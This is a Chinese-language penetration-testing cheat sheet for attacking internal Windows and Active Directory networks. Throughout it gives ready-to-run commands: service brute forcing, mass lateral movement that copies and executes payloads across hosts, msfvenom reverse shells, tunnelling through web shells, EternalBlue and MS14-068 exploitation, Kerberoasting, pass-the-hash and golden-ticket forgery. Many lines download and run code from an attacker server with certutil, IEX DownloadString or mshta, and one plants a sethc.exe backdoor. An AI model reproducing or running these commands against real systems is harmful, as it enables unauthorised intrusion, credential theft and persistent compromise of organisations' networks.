#use auxiliary/scanner/smb/smb_version 开启SMB服务的
#use auxiliary/scanner/smb/smb_enumshares 允许匿名登录的SMB
#use auxiliary/scanner/smb/smb_login SMB爆破
#use auxiliary/scanner/ssh/ssh_version 开启SSH的机器
#use auxiliary/scanner/ssh/ssh_login SSH爆破
#use auxiliary/scanner/telnet/telnet_version 开启TELNET服务的
#use auxiliary/scanner/telnet/telnet_login TELNET爆破
#use auxiliary/scanner/mysql/mysql_version 开启MYSQL服务的
#use auxiliary/scanner/mysql/mysql_login MYSQL爆破
#use auxiliary/scanner/mssql/mssql_ping 开启SQLSERVER服务的
#use auxiliary/scanner/mssql/mssql_login MSSQL爆破
#use auxiliary/scanner/postgres/postgres_version开启POSTGRE服务的
#use auxiliary/scanner/postgres/postgres_login POSTGRESQL爆破
#use auxiliary/scanner/oracle/tnslsnr_version 开启oracle数据库的
#use auxiliary/admin/oracle/oracle_login Oracle数据库爆破
#use auxiliary/scanner/http/title 扫描HTTP标题
#use auxiliary/scanner/rdp/rdp_scanner 开启RDP服务的
#use auxiliary/scanner/http/webdav_scanner
#use auxiliary/scanner/http/http_put 开启WEBDAV的
#use auxiliary/scanner/smb/smb_ms17_010 存在17010漏洞的
#use auxiliary/scanner/http/zabbix_login zabbix爆破
#use auxiliary/scanner/http/axis_login axis爆破
#use auxiliary/scanner/redis/redis_login redis爆破
>nc -znv 192.168.0.98 1-65535
>nc -v -w 1 192.168.0.110 -z 1-1000
>for i in {101..102}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done
$sudo apt-get install clang git gcc make libpcap-dev
$git clone https://github.com/robertdavidgraham/masscan
$cd masscan
$make
>masscan -p80,3389,1-65535 192.168.0.0/24
友好识别web服务
https://github.com/phantom0301/PTscan/blob/master/PTscan.py
>python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306] [-m 50] [-t 10] [-n(不ping)] [-b(开启banner扫描)] [-r查找IP]
80,81,82,83,84,85,86,87,88,89,90,91,901,18080,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,443,8443,7001
https://github.com/k8gege/Aggressor
beacon>Cscan 192.168.0.0/24 OnlinePC
beacon>Cscan 192.168.0.0/24 MS17010
beacon>Cscan 192.168.0.0/24 Osscan
beacon>Cscan 192.168.0.0/24 WebScan
上传账户密码文件user.txt、pass.txt到beacon目录(beacon>pwd)
beacon>Cscan 192.168.0.0/24 FtpScan
上传账户密码文件user.txt、pass.txt到beacon目录(beacon>pwd)
beacon>Cscan 192.168.0.0/24 WmiScan
beacon>Cscan 192.168.0.0/24 CiscoScan
枚举共享
beacon> EnumShare
beacon> EnumMSSQL
建立连接
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
查看连接
>net use
列文件
>dir \\192.168.1.2\c$
查看系统时间
>net time \\192.168.1.2
上传文件
>copy 1.exe \\192.168.1.2\c$
下载文件
>copy \\192.168.1.2\c$\1.exe 1.exe
批量IPC
@echo off
REM Reads one host per line from ip.txt (lines beginning with # are skipped via
REM eol=#) and launches PsExec against each one with a fixed local
REM administrator password. Both `start` invocations in the loop body are
REM asynchronous, so every host is contacted twice in parallel and no exit
REM status is ever checked. The credential is embedded in the script and in
REM every PsExec command line, so it is readable by anyone who can read the
REM file or list processes.
echo check ip addr config file…
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file…
for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd
:end
exit
Schtasks
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
>copy 1.exe \\192.168.1.2\c$
>net time \\192.168.1.2
>at \\192.168.1.2 1:00AM c:\1.exe
>at \\192.168.1.2 1:00AM cmd.exe /c “ipconfig >c:/1.txt”
>type \\192.168.1.2\c$\1.txt
查看计划任务
>at \\192.168.1.2
删除计划任务
>at \\192.168.1.2 计划ID /delete
横向批量上线
>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f http://youip.com:80/shell.txt c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@10.1.1.1 "c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete"
>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
>schtasks /query /fo LIST /v 查看计划任务
上传文件
>copy ok.exe \\192.168.0.55\c$\windows\temp
远程创建定时任务
>schtasks /create /s "192.168.0.55" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM
查询远程创建的任务
>schtasks /query /s "192.168.0.55" /U "admin" /P "qqq23" | findstr "windowsupdate"
立即执行远程任务
>schtasks /run /tn windowsupdate /s "192.168.0.55" /U "admin" /P "qqq23"
删除定时任务
>schtasks /Delete /tn windowsupdate /F /s "192.168.0.55" /u "admin" /p "qqq23"
删除IPC
>net use \\192.168.0.55\ipc$ /del /y
横向批量上线
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy ok.exe \\%i\admin$\debug\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del
>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
>copy ok.exe \\192.168.0.55\c$\windows\temp
>wmic /NODE:" 192.168.0.55" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe"
>del \\192.168.0.55\c$\windows\temp\ok.exe /F
>net use \\192.168.0.55\c$ /del
>psexec -accepteula @ips.txt -u admin -p pass@123 -c 1.bat
#1.bat内容
tasklist /v | find "域管理名字"
@echo off
REM For each host in ip.txt (lines beginning with # skipped), echoes the host to
REM the console and appends the host name plus the output of a remote
REM `tasklist /v` (authenticated with the fixed administrator password) to
REM d:\result.txt.
REM NOTE(review): the for /F option string is wrapped in curly quotes (“eol=#”),
REM which cmd.exe does not treat as quotes, so the options are not parsed as
REM intended; the script above uses straight quotes for the same line.
echo check ip addr config file…
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file…
for /F “eol=#” %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p pass@123 /v) >>d:\result.txt
:end
exit
# route add 内网网卡ip 子网掩码 session的id
# route list
&
Meterpreter>run get_local_subnets查看网段信息再添加路由
# run autoroute -s内网网卡ip/24
# run autoroute -p 查看路由表
&
Meterpreter>run post/multi/manage/autoroute
在已经获得meterpreter的机器上配置管道监听器
meterpreter > pivot add -t pipe -l 已控IP -n bgpipe -a x86 -p windows
生成
>msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST=已控IP PIPENAME=bgpipe -f exe -o pipe.exe
代理
SSH动态转发,是建立正向加密的socks通道
出网靶机编辑后restart ssh服务
#vim /etc/ssh/sshd_config
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes 允许远程主机连接本地转发的端口
TCPKeepAlive yes TCP会话保持存活
PasswordAuthentication yes 密码认证
外部攻击机执行
>ssh -C -f -N -g -D 0.0.0.0:12138 root@出网靶机IP -p 22
MSF中设置全局代理或使用其他软件
>setg proxies socks5:0.0.0.0:12138
即可进行攻击隔离区机器
#vim /etc/ssh/sshd_config
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes 允许远程主机连接本地转发的端口
TCPKeepAlive yes TCP会话保持存活
PasswordAuthentication yes 密码认证
ClientAliveInterval 修改为30-60保持连接
ClientAliveCountMax 取消注释 发送请求没响应自动断开次数
107是外网攻击机
内网靶机执行:
>ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107
攻击机执行
>ssh -p 12138 -qngfNTD 12345 root@192.168.0.107
隧道建立,可使用代理软件配置攻击机外网IP:12345访问内网
生成木马
>msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exe
MSF设置
>setg proxies socks5:0.0.0.0:12138
>use exploit/multi/handler
>set payload windows/x64/meterpreter/bind_tcp_rc4
>set rc4password 123456
>set rhost 10.1.1.97
>set lport 446
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b '\x00' LHOST=公网IP LPORT=12138 -f exe -o /var/www/html/1.exe
Handler监听本地IP:12138
SSH转发
>ssh -N -R 12138:本地内网IP:12138 root@公网IP
#use auxiliary/server/socks4a
#set srvhost 0.0.0.0
#set srvport 1080
#run
多层网络
再多配置个端口
Win: Proxifier& Sockscap64
Linux: proxychains& 浏览器
&
meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > bg
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
#use auxiliary/server/socks5
#set srvhost 0.0.0.0
#set srvport 1080
#run
浏览器
reGeorg
https://github.com/sensepost/reGeorg
>python reGeorgSocksProxy.py -u http://靶机/tunnel.aspx -l 外网IP -p 10080
打开Proxifier,更改为脚本指定的端口10080
或proxychains
#vim /etc/proxychains.conf
去掉dynamic_chain注释>添加socks5 127.0.0.1 10080
或MSF
>setg proxies socks5:外网IP:10080
>setg ReverseAllowProxy true 允许反向代理
Step 1. 设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器
$ python3 neoreg.py generate -k password
伪装页面
$ python3 neoreg.py generate -k <you_password> --file 404.html
Step 2. 使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理
$ python3 neoreg.py -k password -u http://xx/tunnel.php
$ python3 neoreg.py -k <you_password> -u <server_url> --skip
开启代理
$ python neoreg.py -k <you_password> -l 外网IP -p 10081 -u http://xx/neo-tunnel.aspx
ABPTTS端口转发
https://github.com/nccgroup/ABPTTS
端口转发
>python abpttsfactory.py -o webshell 生成shell
./webshell目录下生成的相应脚本文件传入目标中
>python abpttsclient.py -c webshell/config.txt -u "http://目标网址/trans.aspx" -f 攻击机IP:12345/目标IP:3389
ABPTTS转发内网其他机器端口
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389
要转发多个机器或多个端口
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389 -f 192.168.0.107:33891/10.1.1.101:80 -f 192.168.0.107:33892/10.1.1.102:22
SSH代理一级网段
需要一台有权限的Linux靶机
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.108:22
>ssh -p 222 -qTfnN -D 0.0.0.0:1081 root@192.168.0.107
配置proxychains即可
SSH代理二级网段
需要靶机web权限,一级内网一台web权限
转发内网web出来传入abptts的shell
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:8080/10.1.1.108:80
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.107/qq.aspx -f 192.168.0.107:222/10.1.1.106:22
SSH连接192.168.0.107:222即可到达二级网络
反弹msf
kali生成bind型脚本
>msfvenom -p linux/x64/shell_bind_tcp LPORT=12138 -f elf -o shell
在二级不出网linux上执行
将他的12138端口通过abptts转出
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:13128/10.1.1.101:12138
Msf本地监听13128即可
>python proxy.py -u http://192.168.0.98/tunnel.aspx -l 12138 -r 3389 -v
>ew -s ssocksd -l 888
连接sockscap64靶机外网IP+端口888
反弹socks5(目标机无外网IP):
外网攻击机:
>ew -s rcsocks -l 1008 -e 888
-l为socks软件连接的端口,-e为目标主机和vps的通信端口。
靶机:
>ew -s rssocks -d 外网IP -e 1008
sockscap64连接攻击机外网IP+端口1008
二级环境(A有外网,B内网无外网):
靶机B:
>ew -s ssocksd -l 888
靶机A:
>ew -s lcx_tran -l 1080 -f 靶机B -g 888
Sockscap64连接靶机外网IP+端口 1080
外网攻击机:
>ew -s lcx_listen -l 10800 -e 888
靶机B:
>ew -s ssocksd -l 999
靶机A:
>ew -s lcx_slave -d 外网 -e 8888 -f 靶机B -g 9999
Sockscap64连接攻击机外网IP+端口 10080
三级环境(A无外网,B内网无外网通A,C通B):
外网攻击机:
>ew -s rcsocks -l 1008 -e 888
靶机A:
>ew -s lcx_slave -d 外网攻击机 -e 888 -f 靶机B -g 999
靶机B:
>ew -s lcx_listen -l 999 -e 777
靶机C:
>ew -s rssocks -d靶机B -e 777
Sockscap64连接攻击机外网IP+端口 1008
https://github.com/fatedier/frp/releases/
使用条件:目标主机通外网,拥有自己的公网ip
对攻击机外网服务端frps.ini进行配置
[common]
bind_port=8080
靶机客户端
[common]
server_addr=服务器端外网IP
server_port=8080
[socks5]
type=tcp
remote_port=12345
plugin=socks5
use_encryption=true
use_compression=true
以上是启用加密和压缩,能躲避流量分析设备。
上传frpc.exe和frpc.ini到目标服务器上,直接运行frpc.exe(在实战中可能会提示找不到配置文件,需要使用-c参数指定配置文件的路径frpc.exe -c 文件路径),可以修改文件名和配置名以混淆视听。
公网vps主机上运行./frps -c frps.ini
靶机执行./frpc -c frpc.ini
MSF中设置全局变量
>setg proxies 公网IP:12345
>setg ReverseAllowProxy true 允许反向代理
结束攻击
tasklist
taskkill /pid 进程号 -t -f
https://github.com/securesocketfunneling/ssf/releases
边界机器执行:
>ssfd.exe -p 1080 linux执行:./ssfd -p 1080
攻击机执行:
>ssf.exe -D 12138 -p 1080 192.168.0.98(边界机器IP)
本机配置proxychain或proxifier
反向socks代理
攻击机执行:
>ssfd.exe -p 1080
内网机器执行:
>ssf.exe -F 12138 -p 1080 192.168.0.106(攻击机IP)
多级内网机执行:
>ssfd.exe -p 1080 -c config.json
Json文件加入字段
"circuit": [
{"host": "A中继机IP", "port":"1080"},
{"host": "B中继机IP", "port":"1080"}
],
所有中继机执行:
>ssfd.exe -p 1080 -c config.json
边界机器执行:
>ssf.exe -c config.json -p 1080 多级内网机IP -X 12138
边界机执行:
>nc.exe 127.0.0.1 12138即可获得多级内网机cmdshell
攻击机执行:
>ssfd.exe -p 1080 -c config.json
内网机器执行
攻击机执行:
>nc 127.0.0.1 12138
https://github.com/shadowsocks/libQtShadowsocks/releases/download/v2.0.2/shadowsocks-libqss-v2.0.2-win64.7z
靶机新建配置文件1.json,内容为
{
"server":"0.0.0.0",
"server_port":13337,
"local_address":"127.0.0.1",
"local_port":1080,
"password":"123456",
"timeout":300,
"method":"aes-256-cfb",
"fast_open":false,
"workers": 1
}
执行
>shadowsocks-libqss.exe -c 1.json –S
攻击机配置
浏览器或其他攻击软件配置代理127.0.0.1:1080即可(需有http(s)/socks5功能)
https://github.com/snail007/goproxy/releases
靶机执行
>proxy.exe socks -t tcp -p "0.0.0.0:13337"
攻击机配置Proxifier
https://github.com/jpillora/chisel/releases
攻击机监听
>chisel.exe server -p 12138 --reverse
靶机执行
>chisel.exe client 192.168.0.102:12138 R:12345:127.0.0.1:12346
靶机执行
>chisel.exe server -p 12346 --socks5
攻击机执行
>chisel.exe client 127.0.0.1:12345 socks
当隧道建立成功时,攻击机本地会启动1080端口
即可使用
https://ngrok.com/
https://www.ngrok.cc/
下载ngrok
#ngrok authtoken 授权码
#ngrok http 8080
#ngrok tcp 8888
Sockscap64
Proxifier
Proxychains
#vim /etc/proxychains.conf
去掉dynamic_chain注释>添加socks4 127.0.0.1 1080
#cp /usr/lib/proxychains3/proxyresolv /usr/bin
https://ngrok.com/
https://www.ngrok.cc/
下载ngrok
#ngrok authtoken 授权码
#ngrok http 8080
#ngrok tcp 8888
扫描
#use auxiliary/scanner/smb/smb_ms17_010
#set rhosts 192.168.1.0/24
&
#nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20
攻击
#use exploit/windows/smb/ms_17_010_eternalblue易蓝屏
#set payload windows/x64/meterpreter/reverse_tcp
#use auxiliary/admin/smb/ms17_010_command
#set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f
MS08_067
#nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20
#use exploit/windows/smb/ms08_067_netapi
#set payload windows/meterpreter/reverse_tcp
CVE-2019-0708
攻击MySQL数据库
#use auxiliary/scanner/mysql/mysql_version 主机发现
#use auxiliary/scanner/mysql/mysql_login MYSQL爆破
#use exploit/multi/mysql/mysql_udf_payload UDF提权
#use exploit/windows/mysql/mysql_mof MOF提权
#use auxiliary/admin/mysql/mysql_sql 执行命令
>PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()" 列出域内mssql主机
https://github.com/NetSPI/PowerUpSQL
>Get-SQLInstanceLocal #发现本机SQLServer实例
>Get-SQLInstanceDomain #发现域中的SQLServer实例
>Get-SQLInstanceBroadcast #发现工作组SQLServer实例
>$Targets = Get-SQLInstanceBroadcast -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"} 工作组mssql爆破
>$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"}
>Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw -Verbose
>$Targets 域内MSSQL爆破
Nishang脚本爆破MSSQL
>Invoke-BruteForce -ComputerName dc.zone.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose -StopOnSuccess
#use auxiliary/scanner/mssql/mssql_login 爆破主机
#use auxiliary/admin/mssql/mssql_exec 调用cmd
#use auxiliary/admin/mssql/mssql_sql 执行SQL语句
#use exploit/windows/mssql/mssql_payload 上线MSSQL主机
http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1
导入nishang执行MSSQL命令的脚本
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1')
>Execute-Command-MSSQL -ComputerName 192.168.0.98 -UserName sa -Password admin 会返回powershell
#use auxiliary/scanner/mssql/mssql_hashdump 导出MSSQL密码
已知服务器ntlmhash,未知mssql账号密码
Hash注入+socks无密码连接mssql
>mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:. /ntlm:{hash} /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"
将SSMS.exe加入sockscap中启动
命令行版sqltool
https://github.com/uknowsec/SharpSQLTools
隔离主机一般与攻击机无双向路由,payload设置为bind让靶机监听。
>set payload windows/meterpreter/bind_tcp
>set RHOST 隔离机IP
参数:
-l 指定的用户名 -p 指定密码
-L 用户名字典 -P 密码字典
-s 指定端口 -o 输出文件
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V
>hydra -L /root/user.txt -P pass.txt smb 10.1.1.10 -vV
>hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10
参数:
-h 目标名或IP -H 目标列表
-u 用户名 -U 用户名字典
-p 密码 -P 密码字典 -f 爆破成功停止 -M 指定服务 -t 线程
-n 指定端口 -e ns 尝试空密码和用户名密码相同
>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql
>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql
域内爆破
https://github.com/ropnop/kerbrute
用户枚举
>kerbrute_windows_amd64.exe userenum -d zone.com username.txt
密码喷射
>kerbrute_windows_amd64.exe passwordspray -d zone.com use.txt password
密码爆破
此项会产生日志
>kerbrute_windows_amd64.exe bruteuser -d zone.com pass.txt name
组合爆破
格式为username:password
>kerbrute_windows_amd64.exe -d zone.com bruteforce com.txt
https://github.com/dafthack/DomainPasswordSpray
自动收集账户进行密码喷射
>Invoke-DomainPasswordSpray -Password pass
组合爆破
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -PasswordList passlist.txt -OutFile result.txt
会产生日志
单密码
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -Password password
msfvenom生成一个x64或x86的dll文件,替换该工具下的x64.dll或x86.dll
windows server 2008 ,msfvenom生成x64.dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x64.dll
msf配置
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
将该x64.dll替换到方程式利用工具下面。
只需要更换目标的IP,就可以获取session。
windows server 2003 ,msfvenom生成x86.dll文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x86.dll
msf配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
通过ms17_010_command模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道
Kerberoasting
https://github.com/nidem/kerberoast
>setspn -T 域名 -Q */*
Powershell
https://github.com/PyroTek3/PowerShell-AD-Recon
Powerview
>Get-NetComputer -SPN termsrv*
>Get-NetUser -SPN
>import module GetUserSPNs.ps1
>usemodule situational_awareness/network/get_spn
>Add-Type -AssemblyName System.IdentityModel
>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"
&
>kerberos::ask /target:SPN
mimikatz>kerberos::list /export
>python tgsrepcrack.py word.txt file.kirbi
https://github.com/leechristensen/tgscrack
>python extractServiceTicketParts.py file.kirbi
>tgscrack.exe -hashfile hash.txt -wordlist word.txt
>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -u 500
>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -g 512
注入内存
>kerberos::ptt new.kirbi
https://github.com/SecureAuthCorp/impacket
请求TGS
>python GetUserSPNs.py -request -dc-ip 10.1.1.1 zone.com/y
破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
当用户关闭了kerberos预身份认证时可以进行攻击
>Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com
或使用Powerview结合https://github.com/gold1029/ASREPRoast
获取不要求kerberos预身份验证的域内用户
>Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
>Get-ASREPHash -UserName y -Domain zone.com -Verbose
破解RC4-HMAC AS-REP
>john hash.txt --wordlist=wordlist.txt
允许本地管理组所有成员连接
>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
>powershell -ep bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-WMIExec.ps1');
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-TheHash.ps1');
>Invoke-TheHash -Type WMIExec -Target 192.168.0.0/24 -Domain zone.com -Username godadmin -Hash f1axxxxxxxxxb771
>net use \\1.1.1.1\admin$ /user:"administrator" "password"
>copy windowsupdate.exe \\1.1.1.1\admin$\dir\
>wmic /NODE:"1.1.1.1" /user:"administrator" /password:"password" PROCESS call create "c:\windows\dir\windowsupdate.exe"
>del \\1.1.1.1\admin$\dir\windowsupdate.exe /F
>net use \\1.1.1.1\admin$ /del
https://github.com/SecureAuthCorp/impacket
>python wmiexec.py -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 域名/Administrator@192.168.11.1 "whoami"
>python wmiexec.py admin@192.168.1.2
半交互式:
>cscript //nologo wmiexec.vbs /shell 192.168.1.2 admin pass
单条命令
>cscript //nologo wmiexec.vbs /cmd 192.168.1.2 domain\admin pass "whoami"
下载执行
>wmic /node:192.168.0.115 /user:godadmin /password:password PROCESS call create "cmd /c certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe c:/windows/temp/win.exe & c:/windows/temp/win.exe & certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe delete"
>wmic /NODE:192.168.3.108 /user:"godadmin" /password:"password" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/xxx.txt');\""
Invoke-WMIExec
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1a5b1a3641bec99ff92fe9df700b771 -Command \"net user admin Qwe@123 /add\" -Verbose"
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1xxxxxxxxxxxxx771 -Command \"mshta http://192.168.0.107:8080/YAyAPN6odzbAzKn.hta\" -Verbose"
>psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 域名/Administrator@192.168.1.1 "whoami"
>psexec.exe -accepteula \\192.168.1.2 -u admin -p pass cmd.exe 无确认窗
Msf
#use exploit/windows/smb/psexec
#use exploit/windows/smb/psexec_psh(powershell版本)
Windows XP、Vista、2008、7、2008 r2 和2012没有安装KB2871997补丁的机器上,使用NTLM进行PTH
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm}
执行一个文件
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm} /run:powershell.exe
Windows 8.1 、2012 R2、安装KB2871997的Win 7 、2008 R2和2012上可使用AES KEY进行PTH
>privilege::debug
>sekurlsa::ekeys
>sekurlsa::pth /user:administrator /domain:zone.com /aes128:{key}
>pth-winexe -U godadmin%password --system --ostype=1 //192.168.0.115 cmd
>python smbexec.py administrator@192.168.0.98
名词
KDC(Key Distribution Center):密钥分发中心,里面包含两个服务:AS和TGS
AS(Authentication Server):身份认证服务
TGS(Ticket Granting Server):票据授予服务
TGT(Ticket Granting Ticket): 由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时
Golden Ticket伪造TGT(Ticket Granting Ticket),可以获取任何Kerberos服务权限。
域控中提取krbtgt的hash
域控:dc.zone.com
域内机器:sub2k8.zone.com
域内普通用户:y
域内机器不能访问dc上的文件
清空票据
域控中获取krbtgt用户的信息
>privilege::debug
>mimikatz log "lsadump::dcsync /domain:zone.com /user:krbtgt"
获取信息:/domain、/sid、/aes256
在sub2k8中生成golden ticket
>mimikatz "kerberos::golden /krbtgt:{ntlmhash} /admin:域管理 /domain:域名 /sid:sid /ticket:gold.kirbi"
导入
Mimikatz#kerberos::ptt 123.kirbi
Silver Ticket是伪造的TGS,只能访问指定服务权限
域控:dc.zone.com
域内机器:sub2k8.zone.com
域内普通用户:y
域控中导出
>privilege::debug
>sekurlsa::logonpasswords
Sub2k8伪造票据
>mimikatz "kerberos::golden /domain:zone.com /sid:{SID} /target:dc.zone.com /service:cifs /rc4:{NTLM} /user:y /ptt"
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe
域控:dc.zone.com/10.1.1.100
域内机器:sub2k8.zone.com/10.1.1.98
域内普通用户:y,
Sub2k8中清除票据
Mimikatz#kerberos::purge
>whoami /user查看SID
创建ccache票据文件
> MS14-068.exe -u y@zone.com -p password -s S-1-5-21-2346829310-1781191092-2540298887-1112 -d dc.zone.com
注入票据
Mimikatz# Kerberos::ptc c:\xx\xx\xxx.ccache
psexec无密码登陆
>PsExec.exe \\dc.xx.com\ cmd.exe
>whoami /user 查看SID
msf >use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf >set domain 域名
msf >set password 密码
msf >set rhost 域控机器
msf >set user 用户
msf >set user_sid sid
得到.bin文件
#apt-get install krb5-user
上传mimikatz和bin文件
Mimikatz# Kerberos::clist "xxxx.bin" /export
生成kirbi文件
Meterpreter >load kiwi
Meterpreter >download c:/wmpub/xxxxxx.kirbi /tmp/
注入票据
Meterpreter >kerberos_ticket_use /tmp/xxxxxx.kirbi
#use exploit/windows/local/current_user_psexec
#set TECHNIQUE PSH
#set RHOST dc.xx.com
#set payload windows/meterpreter/reverse_tcp
#set LHOST 192.168.1.1
#set session 1
#exploit
#exploit
kali下
#apt-get install krb5-user
#goldenPac.py -dc-ip 10.1.1.100 -target-ip 10.1.1.100 zone.com/y:password@dc.zone.com
设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y
查询非受限委派域内账号,使用powerview
>Get-NetUser -Unconstrained -Domain zone.com
利用
管理员权限打开mimikatz导出TGT
>privilege::debug
>sekurlsa::tickets /export
清空票据,导入票据
获得Powershell会话
> Enter-PSSession -ComputerName dc.zone.com
查询受限委派用户
> Get-DomainUser -TrustedToAuth -Domain zone.com
查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com
利用方法后见权限维持模块
获取域管理员
>Get-DomainUser|select -First 1
域对象信息
>Get-DomainObject -Identity 'DC=zone,DC=com'
ms-ds-machineaccountquota允许非特权用户将最多 10 台计算机连接到域
查看有没有设置msDS-AllowedToActOnBehalfOfOtherIdentity策略
